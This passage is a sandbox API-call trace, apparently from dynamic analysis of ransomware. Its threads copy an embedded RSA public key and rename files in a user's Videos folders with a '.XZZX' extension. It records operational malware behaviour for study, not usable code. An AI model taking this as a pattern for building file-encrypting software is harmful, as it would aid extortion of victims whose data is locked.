CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0255.098] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\F6CF93A0093FDE80969CD2060BFAC2C8.XZZX") returned 117 [0255.098] StrStrW (lpFirst="7B22A6161CBF8AA2C5439A5220F46EEA.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1044 os_tid = 0x1360 [0255.253] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.253] lstrcpyW (in: lpString1=0x2baf460, lpString2="D1B4BDC437A182A42497439F3BC266EC.XZZX" | out: lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX") returned="D1B4BDC437A182A42497439F3BC266EC.XZZX" [0255.254] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\" [0255.254] SetErrorMode (uMode=0x1) returned 0x1 [0255.254] lstrcpyW (in: lpString1=0x2baf860, lpString2="D1B4BDC437A182A42497439F3BC266EC.XZZX" | out: lpString1="D1B4BDC437A182A42497439F3BC266EC.XZZX") returned="D1B4BDC437A182A42497439F3BC266EC.XZZX" [0255.254] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x29047d5f, Data2=0x2155, Data3=0x4900, Data4=([0]=0xbc, [1]=0x1, [2]=0x7d, [3]=0x5a, [4]=0x1c, [5]=0x8e, [6]=0x8, [7]=0xba))) returned 0x0 [0255.254] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\D1B4BDC437A182A42497439F3BC266EC.XZZX") returned 117 [0255.254] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0255.254] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\2SS69ds5b7DlSJShTY0o\\32A6DF8B09813D0029047D5F0C3C2148.XZZX") returned 117 [0255.254] StrStrW (lpFirst="D1B4BDC437A182A42497439F3BC266EC.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1045 os_tid = 0x1364 [0255.411] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.412] lstrcpyW (in: lpString1=0x2baf460, lpString2="60CA942226AA4A29961B00962ADF2E71.XZZX" | out: lpString1="60CA942226AA4A29961B00962ADF2E71.XZZX") returned="60CA942226AA4A29961B00962ADF2E71.XZZX" [0255.412] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0255.412] SetErrorMode (uMode=0x1) returned 0x1 [0255.412] lstrcpyW (in: lpString1=0x2baf860, lpString2="60CA942226AA4A29961B00962ADF2E71.XZZX" | out: lpString1="60CA942226AA4A29961B00962ADF2E71.XZZX") returned="60CA942226AA4A29961B00962ADF2E71.XZZX" [0255.412] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x65322dfa, Data2=0x6694, Data3=0x4cc1, Data4=([0]=0x82, [1]=0xca, [2]=0xce, [3]=0x3b, [4]=0xb2, [5]=0xd1, [6]=0x46, [7]=0xcf))) returned 0x0 [0255.412] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\60CA942226AA4A29961B00962ADF2E71.XZZX") returned 104 [0255.412] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0255.412] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\7F5430881EC1459465322DFA217C29DC.XZZX") returned 104 [0255.412] StrStrW (lpFirst="60CA942226AA4A29961B00962ADF2E71.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1046 os_tid = 0x1368 [0255.565] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.565] lstrcpyW (in: lpString1=0x2baf460, lpString2="E29C4433332B9D3DB3332D67374C8185.XZZX" | out: lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX") returned="E29C4433332B9D3DB3332D67374C8185.XZZX" [0255.565] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0255.565] SetErrorMode (uMode=0x1) returned 0x1 [0255.566] lstrcpyW (in: lpString1=0x2baf860, lpString2="E29C4433332B9D3DB3332D67374C8185.XZZX" | out: lpString1="E29C4433332B9D3DB3332D67374C8185.XZZX") returned="E29C4433332B9D3DB3332D67374C8185.XZZX" [0255.566] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x73300fb0, Data2=0xcd43, Data3=0x4468, Data4=([0]=0x8a, [1]=0xfd, [2]=0x43, [3]=0xf9, [4]=0xcb, [5]=0x7a, [6]=0xee, [7]=0xbd))) returned 0x0 [0255.566] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\E29C4433332B9D3DB3332D67374C8185.XZZX") returned 104 [0255.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0255.566] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\A2240B1036D92F3873300FB039941380.XZZX") returned 104 [0255.566] StrStrW (lpFirst="E29C4433332B9D3DB3332D67374C8185.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1047 os_tid = 0x136c [0255.721] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.721] lstrcpyW (in: lpString1=0x2baf460, lpString2="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" | out: lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" [0255.721] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\" [0255.721] SetErrorMode (uMode=0x1) returned 0x1 [0255.721] lstrcpyW (in: lpString1=0x2baf860, lpString2="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" | out: lpString1="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX" [0255.721] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x461501a1, Data2=0x8e59, Data3=0x434e, Data4=([0]=0x82, [1]=0x2d, [2]=0x20, [3]=0x8f, [4]=0x54, [5]=0xc9, [6]=0x4, [7]=0x56))) returned 0x0 [0255.722] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX") returned 104 [0255.722] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0255.722] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\DTMS 07a7Aq-XEUh0\\O903hcW\\0434DEF9256CAA1E461501A128278E66.XZZX") returned 104 [0255.722] StrStrW (lpFirst="FBBA7EFE065EC5DA534929CE0AC8AA22.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1048 os_tid = 0x1370 [0255.880] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0255.880] lstrcpyW (in: lpString1=0x2baf460, lpString2="3B9FB280013C30BC79FE404005721504.XZZX" | out: lpString1="3B9FB280013C30BC79FE404005721504.XZZX") returned="3B9FB280013C30BC79FE404005721504.XZZX" [0255.880] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0255.880] SetErrorMode (uMode=0x1) returned 0x1 [0255.880] lstrcpyW (in: lpString1=0x2baf860, lpString2="3B9FB280013C30BC79FE404005721504.XZZX" | out: lpString1="3B9FB280013C30BC79FE404005721504.XZZX") returned="3B9FB280013C30BC79FE404005721504.XZZX" [0255.880] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xf2476dfd, Data2=0x381f, Data3=0x4fe5, Data4=([0]=0x83, [1]=0x58, [2]=0x71, [3]=0x9f, [4]=0x80, [5]=0x21, [6]=0x9b, [7]=0xd))) returned 0x0 [0255.880] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\3B9FB280013C30BC79FE404005721504.XZZX") returned 90 [0255.880] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0255.880] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\F6B5A9A31183C4BBF2476DFD143EA903.XZZX") returned 90 [0255.880] StrStrW (lpFirst="3B9FB280013C30BC79FE404005721504.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1049 os_tid = 0x1374 [0256.033] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.033] lstrcpyW (in: lpString1=0x2baf460, lpString2="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" | out: lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" [0256.033] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0256.033] SetErrorMode (uMode=0x1) returned 0x1 [0256.034] lstrcpyW (in: lpString1=0x2baf860, lpString2="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" | out: lpString1="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX" [0256.034] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xe3a95818, Data2=0xa024, Data3=0x4ba9, Data4=([0]=0x88, [1]=0xb7, [2]=0x89, [3]=0xd5, [4]=0x27, [5]=0xb0, [6]=0x47, [7]=0x50))) returned 0x0 [0256.034] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\ADBC71E42FBA59E00D479B5F33DB3E28.XZZX") returned 90 [0256.034] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0256.034] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\DADF63602F5443C4E3A95818320F280C.XZZX") returned 90 [0256.034] StrStrW (lpFirst="ADBC71E42FBA59E00D479B5F33DB3E28.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1050 os_tid = 0x1378 [0256.190] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.190] lstrcpyW (in: lpString1=0x2baf460, lpString2="DB53A738127CCAEBB87D0318169DAF33.XZZX" | out: lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX") returned="DB53A738127CCAEBB87D0318169DAF33.XZZX" [0256.190] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\" [0256.190] SetErrorMode (uMode=0x1) returned 0x1 [0256.190] lstrcpyW (in: lpString1=0x2baf860, lpString2="DB53A738127CCAEBB87D0318169DAF33.XZZX" | out: lpString1="DB53A738127CCAEBB87D0318169DAF33.XZZX") returned="DB53A738127CCAEBB87D0318169DAF33.XZZX" [0256.190] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x89a8e6de, Data2=0x905b, Data3=0x46fd, Data4=([0]=0x8f, [1]=0x46, [2]=0x5b, [3]=0xa3, [4]=0xbf, [5]=0x17, [6]=0x36, [7]=0x4b))) returned 0x0 [0256.190] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\DB53A738127CCAEBB87D0318169DAF33.XZZX") returned 90 [0256.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0256.190] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\xAriJR5aTdl\\F0E6F0EA28078BEF89A8E6DE2AC27037.XZZX") returned 90 [0256.190] StrStrW (lpFirst="DB53A738127CCAEBB87D0318169DAF33.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 1051 os_tid = 0x137c [0256.347] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0256.347] lstrcpyW (in: lpString1=0x2baf460, lpString2="37E85546159C2E64B110DA791A0612AC.XZZX" | out: lpString1="37E85546159C2E64B110DA791A0612AC.XZZX") returned="37E85546159C2E64B110DA791A0612AC.XZZX" [0256.347] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Z-_06k\\" [0256.347] SetErrorMode (uMode=0x1) returned 0x1 [0256.347] lstrcpyW (in: lpString1=0x2baf860, lpString2="37E85546159C2E64B110DA791A0612AC.XZZX" | out: lpString1="37E85546159C2E64B110DA791A0612AC.XZZX") returned="37E85546159C2E64B110DA791A0612AC.XZZX" [0256.347] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x5feb5860, Data2=0x6de8, 